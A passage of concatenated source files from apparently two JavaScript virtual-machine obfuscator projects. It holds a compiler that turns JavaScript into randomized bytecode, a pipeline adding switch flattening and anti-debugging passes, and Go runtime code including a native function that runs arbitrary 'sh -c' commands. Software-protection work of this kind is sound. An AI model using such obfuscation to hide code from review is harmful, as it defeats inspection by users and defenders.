        if (bound && bound.indexOf("awcbb_yhh_fun") !== -1) {
            prologue.push(RandDataCheise(zhilDx.z10));
            prologue.push(toPool(varName));
        }
    }
    prologue.push(RandDataCheise(zhilDx.z1));
    const count = prologue.length;
    for (let k = 0; k < count; k++) {
        unit.zhili.splice(0, 0, prologue.pop());
    }
}
// Compile the top-level program body into the root bytecode unit.
// Mirrors startfun() but walks program statements directly, since the
// root unit has no formal parameters.
function start(node2) {
    const unitName = "awcbb_yhh_fun" + numberKuai;
    numberKuai += 1;
    const unit = { "variablePool": {}, "zhili": [] };
    changlc[unitName] = unit;

    // Compile every top-level statement in source order.
    for (const stmt of node2.program.body) {
        startgetType(stmt, unit.variablePool, unit.zhili);
    }

    // Prepend load instructions for every top-level function declaration.
    const prologue = [];
    for (const varName in unit.variablePool) {
        const bound = unit.variablePool[varName];
        if (bound && bound.indexOf("awcbb_yhh_fun") !== -1) {
            prologue.push(RandDataCheise(zhilDx.z10));
            prologue.push(toPool(varName));
        }
    }
    prologue.push(RandDataCheise(zhilDx.z1));
    const count = prologue.length;
    for (let k = 0; k < count; k++) {
        unit.zhili.splice(0, 0, prologue.pop());
    }
}
start(ast)
cood = ``
datatext = "var constantPool = "+ JSON.stringify(constantPool)+"; var changlc = "+ JSON.stringify(changlc)+";\n"+dataText2;
fs.writeFileSync(outpath, cood + datatext, (e)=>{})
}
// Record the start time (ms) so total processing time can be reported
// at the end of the post-processing pipeline below.
const tst = + new Date()
// Input source file name and output path for the compiled result.
const soure = "t3.js"
const outpath = "./outsrc/out.js"
// Run the JS-VMP compiler over the source file.
cbbjsvmp(soure, outpath);
// The ES6-conversion plugin is buggy; see the README for a working way to convert.
// if (offes5 ===1){
// process.exec(`traceur --script ./src/${soure} --out ./dist/${soure}`, (error, stdout, stderr) => {
// if (!error) {
// console.log("es6 to es5 ==> 成功");
// cbbjsvmp()
// console.log("file is save ==> ./outsrc/out.js");
// } else {
// console.log("es6 to es5 ==> 失败");
// }
// });
// } else {
// cbbjsvmp()
// console.log("file is save ==> ./outsrc/out.js");
// }
// Post-processing pipeline: minify the compiled output, run the
// switch-flattening tool (pswitch), minify+mangle again, then inject the
// anti-debugging pass (jsdebugger). Each stage only runs if the previous
// one succeeded.
// Fix: removed a stray empty template literal (``) that followed the
// inner `} else {` in the original source — a harmless but confusing
// no-op expression statement.
process.exec(`uglifyjs ./outsrc/out.js --output ./outsrc/out3.js`, (error, stdout, stderr) => {
    if (!error) {
        console.log("压缩 ==> 成功");
        console.log("file is save ==> ./outsrc/out3.js");
        process.exec(`node ./tool/pswitch.js`, (error, stdout, stderr) => {
            if (!error) {
                console.log("pswitch ==> 成功");
                console.log("file is save ==> ./outsrc/out2.js");
                process.exec(`uglifyjs ./outsrc/out2.js --mangle --output ./outsrc/out2.js`, (error, stdout, stderr) => {
                    if (!error) {
                        console.log("压缩 ==> 成功");
                        console.log("file is save ==> ./outsrc/out2.js");
                        process.exec(`node ./tool/jsdebugger.js`, (error, stdout, stderr) => {
                            if (!error) {
                                console.log("jsdebugger ==> 成功");
                                console.log("file is save ==> ./outsrc/out4.js");
                                // Report total wall-clock time since startup.
                                console.log("user time =>", +new Date()-tst)
                            } else {
                                console.log("jsdebugger ==> 失败",error);
                            }
                        })
                    } else {
                        console.log("压缩 ==> 失败",error);
                    }
                })
            } else {
                console.log("pswitch ==> 失败", error);
            }
        })
    } else {
        console.log("压缩 ==> 失败", error);
    }
})
|
2833844911/gojsvmp | 4,041 | fs/fs.go | package fs
import (
"bufio"
"fmt"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
"io"
"io/ioutil"
"myvmp/object"
"myvmp/token"
"os"
"os/exec"
)
// FileMy wraps an opened file handle together with the text encoding and
// mode string it was opened with, so the bound native functions
// (Fs_read, Fs_write, ...) know how to transcode and how the file was opened.
type FileMy struct {
	File *os.File // underlying OS file handle
	Encoding string // "utf-8" or "gbk"; any other value falls back to utf-8
	Ms string // open mode: "r" (read), "w" (write/create), "a" (append)
}
// Fs_read reads the remainder of the bound file and returns its contents as
// a string object. When the file was opened with Encoding "gbk" the bytes
// are transcoded from GBK to utf-8; any other encoding value is treated as
// utf-8. Read errors are ignored and yield an empty or partial string,
// matching the original best-effort behaviour.
// Fix: the "utf-8" branch and the default branch were byte-for-byte
// duplicates; they are consolidated behind a single io.Reader.
func Fs_read(myfun *object.FunctionDeclarationObject) object.Object {
	getbding := myfun.BindOb.(*FileMy)
	reader := bufio.NewReader(getbding.File)
	var src io.Reader = reader
	if getbding.Encoding == "gbk" {
		// Transcode GBK bytes to utf-8 on the fly.
		src = transform.NewReader(reader, simplifiedchinese.GBK.NewDecoder())
	}
	data, _ := ioutil.ReadAll(src)
	return &object.StringObject{Value: string(data)}
}
// Fs_cmd runs the string in args[0] through `sh -c` and returns the
// combined stdout+stderr as a string object, or false on failure.
// WARNING: executes its argument as a shell command verbatim.
func Fs_cmd(myfun *object.FunctionDeclarationObject) object.Object {
	script := (*myfun.Args[0]).(*object.StringObject).Value
	proc := exec.Command("sh", "-c", script)
	// Capture standard output and standard error together.
	combined, runErr := proc.CombinedOutput()
	if runErr != nil {
		fmt.Println("Error:", runErr)
		return &object.BoolObject{Value: false}
	}
	return &object.StringObject{Value: string(combined)}
}
// Fs_readCont reads the remainder of the bound file and returns the raw
// bytes as a byte object (no transcoding, unlike Fs_read).
func Fs_readCont(myfun *object.FunctionDeclarationObject) object.Object {
	bound := myfun.BindOb.(*FileMy)
	raw, _ := ioutil.ReadAll(bufio.NewReader(bound.File))
	return &object.ByteObject{Value: raw}
}
// Fs_close closes the bound file handle. Returns true on success,
// false if the close failed.
func Fs_close(myfun *object.FunctionDeclarationObject) object.Object {
	if closeErr := myfun.BindOb.(*FileMy).File.Close(); closeErr != nil {
		return &object.BoolObject{Value: false}
	}
	return &object.BoolObject{Value: true}
}
// Fs_write writes args[0] to the bound file and returns true on success,
// false on a write error. Byte objects are written raw; string objects are
// encoded per the file's Encoding ("gbk" is transcoded, anything else is
// written as utf-8).
// Fix: the byte branch previously discarded the error from File.Write while
// the string branch reported failures — the error is now checked
// consistently in both branches.
func Fs_write(myfun *object.FunctionDeclarationObject) object.Object {
	bound := myfun.BindOb.(*FileMy)
	file := bound.File
	arg := *myfun.Args[0]
	if arg.Type() == token.BYTE {
		// Raw bytes bypass any text encoding.
		if _, err := file.Write(arg.(*object.ByteObject).Value); err != nil {
			return &object.BoolObject{Value: false}
		}
		return &object.BoolObject{Value: true}
	}
	text := arg.(*object.StringObject).Value
	var err error
	if bound.Encoding == "gbk" {
		// Transcode utf-8 text to GBK before writing.
		w := transform.NewWriter(file, simplifiedchinese.GBK.NewEncoder())
		_, err = io.WriteString(w, text)
		w.Close()
	} else {
		// "utf-8" and the unspecified default write the text verbatim.
		_, err = io.WriteString(file, text)
	}
	if err != nil {
		return &object.BoolObject{Value: false}
	}
	return &object.BoolObject{Value: true}
}
// new_Func wraps a native Go function as a FunctionDeclarationObject,
// binding it to the given receiver object and type tag.
func new_Func(ddd *func(*object.FunctionDeclarationObject) object.Object, typeS string, Obj any) object.Object {
	return &object.FunctionDeclarationObject{
		IsNative:   1,
		NativeBody: ddd,
		BindType:   typeS,
		BindOb:     Obj,
	}
}
// Fs_open implements fs.open(path[, config]): opens a file and returns an
// environment object exposing read/readCont/close/write plus an Iserror
// flag. The optional config object may set the text encoding
// ("utf-8"/"gbk") and the mode ms ("r"/"w"/"a").
func Fs_open(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args[0]
	fsDt := object.NewEnv(nil)
	// Pessimistically mark the handle as errored until the open succeeds.
	fsDt.Store.Set(token.Iserror, &object.BoolObject{Value: true})
	filePAth := (*dt).(*object.StringObject).Value
	// Defaults: read-only, utf-8.
	ms := "r"
	encoding := "utf-8"
	if len(myfun.Args) >= 2 {
		// Optional config object supplies encoding and/or mode overrides.
		configOb := (*myfun.Args[1]).(*object.Environment)
		enc, ok := configOb.Store.Get(token.Fs_encoding)
		if ok {
			encoding = enc.ToString()
		}
		mse, ok := configOb.Store.Get(token.Fs_ms)
		if ok {
			ms = mse.ToString()
		}
	}
	var file *os.File
	var err error
	if ms == "w" {
		// NOTE(review): no os.O_TRUNC here, so writing less than an existing
		// file's length leaves its old tail in place — confirm intended.
		file, err = os.OpenFile(filePAth, os.O_WRONLY|os.O_CREATE, 0666)
	} else if ms == "a" {
		file, err = os.OpenFile(filePAth, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0666)
	} else {
		// Any other mode (including the default "r") opens read-only.
		file, err = os.Open(filePAth)
	}
	if err != nil {
		// Open failed: return the environment with Iserror still true.
		fmt.Printf("Error opening file: %v\n", err)
		return fsDt
	}
	fsDt.Store.Set(token.Iserror, &object.BoolObject{Value: false})
	// Bind the native file operations to this handle.
	fs_read := Fs_read
	fs_readCont := Fs_readCont
	fs_close := Fs_close
	fs_write := Fs_write
	dd := &FileMy{File: file, Encoding: encoding, Ms: ms}
	fsDt.Store.Set(token.Fs_read, new_Func(&fs_read, token.File, dd))
	fsDt.Store.Set(token.Fs_readCont, new_Func(&fs_readCont, token.File, dd))
	fsDt.Store.Set(token.Fs_close, new_Func(&fs_close, token.File, dd))
	fsDt.Store.Set(token.Fs_write, new_Func(&fs_write, token.File, dd))
	return fsDt
}
|
2833844911/gojsvmp | 1,362 | require/require.go | package require
import (
	"bufio"
	"fmt"
	"io"
	"io/ioutil"
	"os"
	"strings"

	"golang.org/x/text/encoding/simplifiedchinese"
	"golang.org/x/text/transform"

	"myvmp/object"
)
// RequireInfo caches modules loaded via require: DtInfo maps a module path
// to its evaluated environment.
// NOTE(review): IsDo's exact semantics are not visible in this file —
// confirm against the call sites before relying on it.
type RequireInfo struct {
	DtInfo map[string]*object.Environment
	IsDo string
}
// ReadFile reads a script file and returns its contents as a string,
// always terminated with ";". The first line may be an encoding marker:
//
//	//--utf-8--  : rest of file is utf-8 (marker line is dropped)
//	//--gbk--    : rest of file is GBK, transcoded to utf-8 (marker dropped)
//
// Any other first line is kept as part of the content. Returns "" on error.
// Fix: bufio.Reader.ReadString returns io.EOF *together with* the data when
// the last line has no trailing newline; the original treated that as a
// fatal error and silently returned "" for any single-line file.
func ReadFile(Path string) string {
	file, err := os.Open(Path)
	if err != nil {
		fmt.Printf("Error opening file: %v\n", err)
		return ""
	}
	defer file.Close()
	reader := bufio.NewReader(file)
	flineee, err := reader.ReadString('\n')
	if err != nil && err != io.EOF {
		fmt.Printf("Error reading first line: %v\n", err)
		return ""
	}
	fline := strings.TrimSpace(flineee)
	firstLine := strings.Replace(fline, " ", "", -1)
	var content string
	switch firstLine {
	case "//--utf-8--":
		data, err := ioutil.ReadAll(reader)
		if err != nil {
			fmt.Printf("Error reading file: %v\n", err)
			return ""
		}
		content = string(data)
	case "//--gbk--":
		// Decode the remainder from GBK to utf-8.
		gbkReader := transform.NewReader(reader, simplifiedchinese.GBK.NewDecoder())
		data, err := ioutil.ReadAll(gbkReader)
		if err != nil {
			fmt.Printf("Error reading file: %v\n", err)
			return ""
		}
		content = string(data)
	default:
		// No marker: the first line is real content, so re-attach it.
		data, err := ioutil.ReadAll(reader)
		if err != nil {
			fmt.Printf("Error reading file: %v\n", err)
			return ""
		}
		content = fline + "\n" + string(data)
	}
	content = strings.TrimSpace(content) + ";"
	return content
}
|
2833844911/cy_jsvmp | 35,630 | oldjiamian.js | const parser = require("@babel/parser");
const generator = require("@babel/generator").default;
const fs = require("fs");
const {renameCj} = require("./tool/rename");
const {hsjsvmpTo} = require("./tool/gooutmvp");
const {switchtoif} = require("./tool/switchtoif");
const {bindfun} = require("./tool/bindfun");
const {tosanyuan} = require("./tool/tosanyuan")
const {es6toes5} = require("./tool/es5toes6");
const process = require("child_process");
// 是否转es5
offes5 = 0
var fornum = 0
var dat = {"instanceof":1811,"+":20, "<":24, "*":27, "%":28, "^":29, "/":30, "<<":31, "|":32, ">>":33, ">>>":34, "&":35, "-":19, "<=": 36, ">=":37,">":38,"==":39,"===":53,"!==":54,"!=":550,"in":551}
var datkey = Object.keys(dat)
for (let i = 0; i< datkey.length; i++){
datkey[i] = datkey[i]+"="
}
// Return a new array with the elements of `data` in uniformly random order;
// the input array is left unmodified. Works as a selection shuffle: pick a
// random element from the not-yet-taken region, emit it, then move the last
// untaken element into the vacated slot.
// Fix: the original's do/while body ran once even for an empty input and
// returned [undefined]; a pre-test loop guards that case. The redundant
// ((length - n) - 1) + 1 arithmetic is also simplified.
function RandDataArray(data) {
    var pool = [].concat(data);
    var shuffled = [];
    var length = pool.length;
    var taken = 0;
    while (taken < length) {
        var remaining = length - taken;
        var position = Math.floor(Math.random() * remaining);
        shuffled.push(pool[position]);
        taken++;
        // Backfill the hole with the last element still in play.
        pool[position] = pool[length - taken];
    }
    return shuffled;
}
// Complete list of logical opcode ids understood by the VM; each id is
// assigned 30 random aliases in zhilDx below.
var zhil = [
    1811,1810,551, 550, 291, 290, 252, 240, 200, 197, 195, 194, 192, 190, 181, 150, 105, 104, 90, 60, 58, 57, 56, 55, 54, 53, 52, 51, 50, 49, 48, 47, 46, 45, 44, 40, 39, 38, 37, 36, 35, 34, 33, 32, 31, 30, 29, 28, 27, 26, 25, 24, 23, 22, 20, 19, 11, 10, 8, 2, 1
]
// Build a shuffled pool of 100000 distinct numbers, then hand each logical
// opcode 30 unique random aliases, stored as zhilDx["z<opcode>"].
zhenzhil = []
for (let n = 0; n < 100000; n++) {
    zhenzhil.push(n)
}
zhenzhil = RandDataArray(zhenzhil)
zhilDx = {}
for (const code of zhil) {
    const aliases = []
    for (let k = 0; k < 30; k++) {
        aliases.push(zhenzhil.pop())
    }
    zhilDx["z" + code] = aliases
}
// Persist the opcode-alias mapping so the matching interpreter/decoder
// tooling can translate the randomized opcodes back.
var d = JSON.stringify(zhilDx) +""
fs.writeFileSync("./dist/jiamain.json", d, (e)=>{})
// Pick one element of `data` uniformly at random.
function RandDataCheise(data) {
    const idx = Math.floor(Math.random() * data.length);
    return data[idx];
}
// Load the VM stack-object template (cshshuzduei.js), rename its stack
// methods to opaque two/three-letter names, and splice a randomized chain
// table into the CbbTHALLYhh placeholder. The chain maps each "cbbN" key to
// [previous key, next key, undefined], linking keys 1..999 in a random
// order — presumably used to obfuscate stack bookkeeping at runtime.
function getchhduei(){
    var duei = fs.readFileSync("./tool/cshshuzduei.js") + '';
    // Rename the stack primitives so the emitted code doesn't expose
    // recognizable method names.
    duei = duei.replace(/this\.pop/g, "this.cf")
    duei = duei.replace(/this\.push/g, "this.cF")
    duei = duei.replace(/this\.shift/g, "this.Cf")
    duei = duei.replace(/this\.xujia/g, "this.CF")
    duei = duei.replace(/this\.length/g, "this.CFf")
    // Shuffle the chain keys 2..999 ("cbb1" is the fixed head).
    var hu = []
    for (var i = 2; i< 1000; i++){
        hu.push(i)
    }
    hu = RandDataArray(hu)
    var dat = '{"cbb1": [undefined, "cbbbhhhh", undefined],'
    var sc = 1
    for (let i =0; i< hu.length; i++){
        // Patch the previous entry's "next" slot, then append this entry.
        dat = dat.replace("cbbbhhhh","cbb"+hu[i])
        var d = `"${"cbb"+hu[i]}": ["${"cbb"+sc}", "cbbbhhhh", undefined],`
        dat += d
        sc = hu[i]
    }
    // The last entry has no successor.
    dat = dat.replace("cbbbhhhh","")
    dat += '};'
    duei = duei.replace("CbbTHALLYhh", dat)
    return duei;
}
function cbbjsvmp(){
var dataText
if (offes5 === 1){
dataText = fs.readFileSync("./dist/"+soure) + '';
}else {
dataText = fs.readFileSync("./src/"+soure) + '';
}
var dataText2 = getchhduei() + fs.readFileSync("./tool/jsvmp_outcs.js") + '';
dataText2 = dataText2.replace(/duei\.pop/g, "duei.cf")
dataText2 = dataText2.replace(/duei\.push/g, "duei.cF")
dataText2 = dataText2.replace(/duei\.shift/g, "duei.Cf")
dataText2 = dataText2.replace(/duei\.xujia/g, "duei.CF")
dataText2 = dataText2.replace(/duei\.length/g, "duei.CFf")
dataText2 = dataText2.replace(/g2\.pop/g, "g2.cf")
dataText2 = dataText2.replace(/g2\.push/g, "g2.cF")
dataText2 = dataText2.replace(/g2\.shift/g, "g2.Cf")
dataText2 = dataText2.replace(/g2\.xujia/g, "g2.CF")
dataText2 = dataText2.replace(/g2\.length/g, "g2.CFf")
// 指令扩展
dataText2 = hsjsvmpTo(dataText2)
// 函数隐藏
dataText2 = bindfun(dataText2)
// 变if else
dataText2 = switchtoif(dataText2)
//es6toes5
dataText = es6toes5(dataText)
// 变3元
for (let i = 0; i< 300; i++){
dataText2 = tosanyuan(dataText2)
}
var changlc = {}
var constantPool = []
var ast = parser.parse(dataText)
// 使用插件优化代码
// ast = renameCj(ast)
var numberKuai = 0
function copyArrayList(sour, newl){
for (let i = 0; i < newl.length; i++){
sour.push(newl[i])
}
}
function toPool(value){
var a1,a2
a1 = constantPool.indexOf(value)
if (a1 == -1){
a2 = constantPool.length
constantPool.push(value)
return a2
}else{
return a1
}
}
function startgetType(node, variablePool, zhili){
if (node == null){
return;
}
var a1,a2,a3,a4,a5;
switch(node.type){
case "EmptyStatement":
break
case "ConditionalExpression":
case "IfStatement":
startgetType(node.test, variablePool, zhili);
if (node.test.type === "AssignmentExpression"){
startgetType(node.test.left, variablePool, zhili);
}
zhili.push(RandDataCheise(zhilDx.z192))
let ujj3 = []
startgetType(node.alternate, variablePool, ujj3)
zhili.push(ujj3.length + 2)
copyArrayList(zhili,ujj3)
zhili.push(RandDataCheise(zhilDx.z190))
let ujj2 = []
startgetType(node.consequent, variablePool, ujj2)
zhili.push(ujj2.length)
copyArrayList(zhili,ujj2)
break
case "VariableDeclaration":
for (let i=0;i< node.declarations.length; i++){
startgetType(node.declarations[i], variablePool, zhili)
}
break
case "ForInStatement":
fornum += 1
let fbme = fornum
startgetType(node.right, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z57))
zhili.push(fbme)
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( 0))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
zhili.push(toPool("for_in_xh_cbb"+fbme))
let fggg = zhili.length
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb_list"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("length"))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z240))
zhili.push(RandDataCheise(zhilDx.z25))
let dyyy = []
if (node.left.type === "VariableDeclaration"){
startgetType(node.left, variablePool,dyyy)
startgetType(node.left.declarations[0].id, variablePool,dyyy)
}else {
startgetType(node.left, variablePool,dyyy)
}
dyyy.pop()
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool( "for_in_xh_cbb_list"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z90))
startgetType(node.body,variablePool,dyyy)
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z26))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z190))
dyyy.push(fggg - zhili.length -dyyy.length -2 )
let bbblenko = dyyy.length
for (let i =0; i< bbblenko; i++){
if (dyyy[i] == "cbb_break_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 2
}else if (dyyy[i] == "cbb_continue_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 7
}
}
zhili.push(dyyy.length)
copyArrayList(zhili, dyyy)
break
case "UpdateExpression":
startgetType(node.argument, variablePool, zhili)
if (node.operator =="++"){
// zhili.push(26)
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}else if (node.operator =="--"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z19))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}
break
case "BreakStatement":
zhili.push("cbb_break_in_the_this_yhh_417")
zhili.push(undefined)
break
case "DebuggerStatement":
zhili.push(RandDataCheise(zhilDx.z194))
break
case "ForStatement":
startgetType(node.init, variablePool,zhili)
let lenko = zhili.length
startgetType(node.test, variablePool,zhili)
if (node.test == null)
{
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(true))
}
zhili.push(RandDataCheise(zhilDx.z25))
let fgfgfdsujj = []
startgetType(node.body, variablePool, fgfgfdsujj)
startgetType(node.update, variablePool, fgfgfdsujj)
fgfgfdsujj.push(RandDataCheise(zhilDx.z190))
fgfgfdsujj.push(lenko - zhili.length - fgfgfdsujj.length -2)
zhili.push(fgfgfdsujj.length)
lenko = fgfgfdsujj.length
for (let i =0; i< lenko; i++){
if (fgfgfdsujj[i] == "cbb_break_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 2
}else if (fgfgfdsujj[i] == "cbb_continue_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 4
}
}
copyArrayList(zhili, fgfgfdsujj)
break
case "WhileStatement":
let ffflenko = zhili.length
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z25))
let jiiiujj = []
startgetType(node.body, variablePool, jiiiujj)
jiiiujj.push(RandDataCheise(zhilDx.z190))
jiiiujj.push(ffflenko - zhili.length - jiiiujj.length -2)
zhili.push(jiiiujj.length)
ffflenko = jiiiujj.length
for (let i =0; i< ffflenko; i++){
if (jiiiujj[i] == "cbb_break_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 2
}else if (jiiiujj[i] == "cbb_continue_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 4
}
}
copyArrayList(zhili, jiiiujj)
break
case "DoWhileStatement":
let lenko2 = zhili.length
let ujj = []
startgetType(node.body, variablePool,ujj)
// ujj.push(190)
// ujj.push(lenko - zhili.length -ujj.length-2)
lenkoe = ujj.length
for (let i =0; i< lenkoe; i++){
if (ujj[i] == "cbb_break_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 2
}else if (ujj[i] == "cbb_continue_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 4
}
}
copyArrayList(zhili, ujj)
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z192))
zhili.push(lenko2-zhili.length-1)
break
case "ContinueStatement":
zhili.push("cbb_continue_in_the_this_yhh_417")
zhili.push(undefined)
break
case "VariableDeclarator":
variablePool[node.id.name] = null;
if (node.init != null){
startgetType(node.init, variablePool, zhili)
if (node.init.type == "AssignmentExpression"){
startgetType(node.init.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
a1 = constantPool.indexOf(node.id.name)
if (a1 == -1){
zhili.push(constantPool.length)
constantPool.push(node.id.name)
}else{
zhili.push(a1)
}
}
break
case "SwitchStatement":
startgetType(node.discriminant, variablePool,zhili)
if (node.discriminant.type === "AssignmentExpression"){
startgetType(node.discriminant.left, variablePool,zhili)
}
let hu = node.cases.length
let zwdz = [];
let gggcbb = []
for (let i = 0;i < hu; i++){
let litshuz = []
if (node.cases[i].test == null){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
}else{
startgetType(node.cases[i].test, variablePool, zhili)
}
zwdz.push(gggcbb.length)
// 块
for (let i2 = 0; i2 < node.cases[i].consequent.length; i2++){
startgetType(node.cases[i].consequent[i2], variablePool, litshuz)
}
copyArrayList(gggcbb, litshuz)
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
for (let i = 0;i < zwdz.length; i++){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(zwdz[i]))
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(gggcbb.length))
zhili.push(RandDataCheise(zhilDx.z48))
zhili.push(hu+1)
let oolenko = gggcbb.length
for (let i =0; i< oolenko; i++){
if (gggcbb[i] == "cbb_break_in_the_this_yhh_417"){
gggcbb[i] = RandDataCheise(zhilDx.z190);
gggcbb[i+1] = oolenko - i -2
}
}
copyArrayList(zhili, gggcbb)
break
case "LogicalExpression":
if (node.operator == "&&"){
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z51))
let bh = []
startgetType(node.right, variablePool, bh)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, bh)
}
zhili.push(bh.length)
copyArrayList(zhili, bh)
}else if (node.operator == "||"){
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z252))
let bh = []
startgetType(node.right, variablePool, bh)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, bh)
}
zhili.push(bh.length)
copyArrayList(zhili, bh)
}
break
case "BooleanLiteral":
case "NumericLiteral":
case "NullLiteral":
case "StringLiteral":
zhili.push(RandDataCheise(zhilDx.z10))
a1 = constantPool.indexOf(node.value)
zhili.push(toPool(node.value))
break;
case "Identifier":
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.name))
zhili.push(RandDataCheise(zhilDx.z181))
break
case "MemberExpression":
startgetType(node.object, variablePool, zhili)
if (node.object.type == "AssignmentExpression"){
startgetType(node.object.left, variablePool, zhili)
}
if (node.property.type == "Identifier" && node.computed == false){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else if (node.property.type == "NumericLiteral" || node.property.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.value))
zhili.push(RandDataCheise(zhilDx.z181))
}else{
startgetType(node.property, variablePool, zhili)
if (node.property.type == "AssignmentExpression"){
startgetType(node.property.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "BinaryExpression":
startgetType(node.right, variablePool, zhili)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, zhili)
}
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator]]))
break
case "UnaryExpression":
if (node.argument.type == "NumericLiteral" || node.argument.type == "BooleanLiteral" || node.argument.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( node.argument.value))
}else{
startgetType(node.argument, variablePool, zhili)
}
if (node.operator == "~"){
zhili.push(RandDataCheise(zhilDx.z44))
}else if (node.operator == "typeof"){
zhili.push(RandDataCheise(zhilDx.z49))
}else if (node.operator == "!"){
zhili.push(RandDataCheise(zhilDx.z60))
}else if (node.operator == "-"){
zhili.push(RandDataCheise(zhilDx.z50))
}else if (node.operator == "delete"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z55))
}else if (node.operator == "void"){
zhili.push(RandDataCheise(zhilDx.z56))
}
break
case "CallExpression":
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
if (node.arguments[i].type == "AssignmentExpression" && node.arguments[i].operator == "="){
startgetType(node.arguments[i].left, variablePool, zhili)
}
}
startgetType(node.callee, variablePool, zhili)
if (node.callee.type == "AssignmentExpression"){
startgetType(node.callee.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z150))
zhili.push(node.arguments.length)
break
case "FunctionDeclaration":
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun(node)
break
case "ArrowFunctionExpression":
case "FunctionExpression":
let bcxh
if (node.id){
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[node.id.name] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.id.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else {
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[bcxh] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(bcxh))
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "SequenceExpression":
var d,ohh;
for (let i=0; i< node.expressions.length; i++){
startgetType(node.expressions[i], variablePool, zhili)
